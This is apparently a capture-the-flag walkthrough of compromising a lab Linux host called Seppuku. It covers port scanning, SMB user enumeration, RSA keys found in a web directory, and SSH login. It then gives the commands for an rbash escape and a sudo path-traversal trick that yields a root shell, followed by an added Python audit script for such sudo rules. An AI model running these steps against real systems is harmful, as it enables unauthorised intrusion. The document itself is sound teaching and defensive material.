# Samurai

## Nmap

```
sudo nmap 192.168.104.90 -p- -sS -sV

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http          nginx 1.14.2
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
7080/tcp open  ssl/empowerid LiteSpeed
7601/tcp open  http          Apache httpd 2.4.38 ((Debian))
8088/tcp open  http          LiteSpeed httpd
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Starting off on this machine, we find that port 80 is restricted by an HTTP basic auth login.

![](/files/-MXNXmmHrq8pGgP3WSaE)

I decided against brute-forcing for the moment and moved straight on to other ports on the machine. Looking at port 445 for SMB, I ran enum4linux against the target and discovered some user accounts.

```
enum4linux -u '' -p '' -a 192.168.104.90 
```

![](/files/-MXNYRlaSNlvW95z6Nu3)

We have discovered the following users:

* seppuku
* samurai
* tanto

Otherwise, with no open shares on SMB, we move on to enumerating port 7601, which in the browser takes us to the following:

![](/files/-MXNZ_EoAN_5pAdy8tq4)

Running `dirsearch.py` against this port reveals the /keys/ directory.

```
python3 dirsearch.py -u http://192.168.104.90:7601  -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60 --full-url
```

![](/files/-MXNd3pyEnoRIPsywUMN)

![](/files/-MXNcqaYG6pokcYjbj9t)

Private and private.bak contain RSA keys. I moved the key over to my desktop, renamed it to `id_rsa` and used `chmod` to set appropriate permissions.

```
chmod 600 id_rsa
```

Knowing of the three users on the target machine, we can guess and log in over `SSH`. I was able to log in as the user tanto.

```
ssh -i id_rsa tanto@192.168.172.90 
```

![](/files/-MXNdYPUOjElxWTVH8Rz)

Once logged in as tanto, we see that we are restricted to `rbash` and unable to run some commands. I used the following command sequence to first escape `rbash`, then export a new path, and finally upgrade to a Python shell again.

```
python -c 'import os; os.system("/bin/sh")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
```

Once we could move around the box again, I moved into the seppuku user's directory. The file `.passwd` is of interest and contains the password: `12345685213456!@!@A`

This password did not work for the user seppuku, but I was able to use `su` and the password to log in as the user samurai.

![](/files/-MXNeCi55FfmcNjvjUH3)

![](/files/-MXNeHuSEZRraaeSYD3m)

I then transferred linpeas over to the attacking machine which soon picked up sudo permissions.

![](/files/-MXOBSkTnpXues2sNvP8)

Open another tab and log in as tanto over `SSH` again. Then create the directory and file so we can execute it as the user samurai. Once the directory and `bin` file have been created, echo in a bash shell, then `chmod` to make it executable.

```
mkdir .cgi_bin
cd .cgi_bin
echo '/bin/bash' > bin
chmod 755 bin
```

![](/files/-MXOCHpotWw8Gysj9e4D)

Then, on our other tab, execute the file with the following command to gain a root shell:

```
sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
```

![](/files/-MXOCVl2UxuCUUkvu5t1)
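
From the defender's side, a sudo rule like the one abused above can be caught by auditing sudoers command paths before they ship. The following is an added example, not part of the original writeup: it assumes the sudoers entry matches the command string run above, and `audit_sudo_command` and `TRUSTED_PREFIXES` are names chosen here for illustration.

```python
import os
import posixpath
import stat

# Assumption: directories that only root can write to on this host.
TRUSTED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                    "/usr/local/bin/", "/usr/local/sbin/")


def audit_sudo_command(spec, root=None):
    """Return findings for one sudoers command spec ("path [args...]").

    root=None runs only the string checks; pass root="/" on a live host
    (or a test directory) to also check ownership along the path.
    """
    path, *args = spec.split()
    findings = []
    if ".." in path.split("/"):
        findings.append("path contains '..' components")
    resolved = posixpath.normpath(path)
    if not resolved.startswith(TRUSTED_PREFIXES):
        findings.append(f"resolves outside trusted dirs: {resolved}")
    if any(ch in arg for arg in args for ch in "*?["):
        findings.append("wildcard in arguments")
    if root is not None:
        cur = root
        for comp in resolved.strip("/").split("/"):
            cur = os.path.join(cur, comp)
            if not os.path.exists(cur):
                # A missing target can be created by whoever owns the parent.
                findings.append(f"does not exist: {cur}")
                break
            st = os.stat(cur)
            if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append(f"non-root can modify: {cur}")
                break
    return findings


if __name__ == "__main__":
    # Constructed sample: the command string from the writeup, plus a benign one.
    for spec in ("/../../../../../../home/tanto/.cgi_bin/bin /tmp/*",
                 "/usr/bin/systemctl restart nginx"):
        print(spec, "->", audit_sudo_command(spec) or "ok")
```

Run with `root="/"` on the host being audited; any finding means the rule should point at a root-owned binary in a root-owned directory instead.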
